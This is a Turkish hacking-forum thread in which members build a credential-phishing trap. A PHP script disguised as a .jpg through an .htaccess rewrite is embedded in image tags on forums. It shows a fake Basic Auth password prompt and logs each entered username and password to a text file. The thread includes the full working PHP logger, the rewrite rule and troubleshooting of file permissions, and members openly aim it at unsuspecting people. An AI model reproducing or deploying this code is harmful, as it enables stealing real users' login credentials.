Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri 
10 Numara Yöntem Ama Nasıl? 10 Numara Yöntem Ama Nasıl?
-
Sen fark edemiomusun hocam, sitenin ortasına şifreli bi pencere gelirse silerler die???
Yaptığın şeyin yanlış olduğunu bile bile yapıyorsun, sonrada mesaj silinince trip atıyosun...
Fark edemeyeceğin bişeymi yapıldı acaba?
Mesajını geri koydum yerine...
-
Genki bunu yazdı:
-----------------------------smile.php yi þifrelemiþ. img taglarý arasýndada mesaj olarak yollamýþ. sistem smile.php yi image olarak göstermeye calisirken þifreye takýlmýs. aslýnda güzel fikir dalgýnlýktan þifreyi yazalar olabilir. Tabi smile.phpde büyük ihtimal log tutucu var.
aþaðýdaki resimde test.
http://csturkey.gen.tr/test/test.jpgbunu image tagları içinde alın
-----------------------------bunu zaten biliyoruz panelden klasöre şifre koymakta bişey yok öenmli olan şifreyi nasıl kayıt ettiricez, bende bir bildiğin var zannettim :S
-
Genki bunu yazdı:
-----------------------------smile.php yi þifrelemiþ. img taglarý arasýndada mesaj olarak yollahttp://csturkey.gen.tr/test/test.jpgmýþ. sistem smile.php yi image olarak göstermeye calisirken þifreye takýlmýs. aslýnda güzel fikir dalgýnlýktan þifreyi yazalar olabilir. Tabi smile.phpde büyük ihtimal log tutucu var.
aþaðýdaki resimde test.
http://csturkey.gen.tr/test/test.jpgbunu image tagları içinde alın
-----------------------------
cidden oluyor nan bu linkle ah bide log tutmayı açıklayabilsek.
varya mükemmel üstü olucak bence... -
şimdi bu log tutuyormu tutamıyormu bu şekilde olursa benim tanıdığım yüzlerce enayi var bunu yiyecek :D
-
gokhan_ssl bunu yazdı:
-----------------------------bunu zaten biliyoruz panelden klasöre şifre koymakta bişey yok öenmli olan şifreyi nasıl kayıt ettiricez, bende bir bildiğin var zannettim :S
-----------------------------panelden şifre felan koyduğum yok.
test.php nin içeriği
# Konfigurasyon
$sayfaSifreleme ='1'; # 1 acik , 0 kapali
$kullaniciAdi = 'genki';
$sifre = 'genki';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="Güvenlik Için Tekrar Kullanici Adi ve Sifre Girin"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme =='1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
# Sayfanizin kodlari
echo "
";
?>zaten nette kodu rahatlıkla bulursunuz. şöle bir ekleme ilede
<?php
$sayfaSifreleme ='1'; # 1 acik , 0 kapali
$kullaniciAdi = 'genki';
$sifre = 'genki';
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="Güvenlik Için Tekrar Kullanici Adi ve Sifre Girin"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
$dadi = "log.txt";
$dosya = fopen ($dadi , 'a') or die ("dosya açılamadı");
$loggirdi = "User :$_SERVER[PHP_AUTH_USER]\nPass :$_SERVER[PHP_AUTH_PW] \n";
fwrite($dosya,$loggirdi) ;
fclose($dosya);
if($sayfaSifreleme =='1') {
yetkiKontrol($kullaniciAdi,$sifre);
}
echo "<img src=\"test.gif\" />";
?>
log tutar hale getirirsiniz.Belki php dosyasını image tagları arasına alamazsınız.o yüzden htaccses deRewriteEngine on
RewriteRule ^test.jpg$ test.php [L,NC]
yaparak dosyayı jpg olarak gösterebilirsiniz -
ok evyllah hocam peki log.txt dosyasının permissionunu kaç yapacaz? böyle hata veriyor
Warning: fopen(log.txt) [function.fopen]: failed to open stream: Permission denied in /home/a3779708/public_html/deneme/test.php on line 12
-
test.php nin permission 777 yap.
-
log.txt chmod 666 olacakmış saol
-
777 yap işte.
-
yaptım
www.**********.com/deneme/test.php --- şifre soran ekran
www.--------------.com/deneme/log.txt --- şifrelerin kayıt edildiği yer
log.txt dosyasına 666 vermeniz gerekiyor yazma izni
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla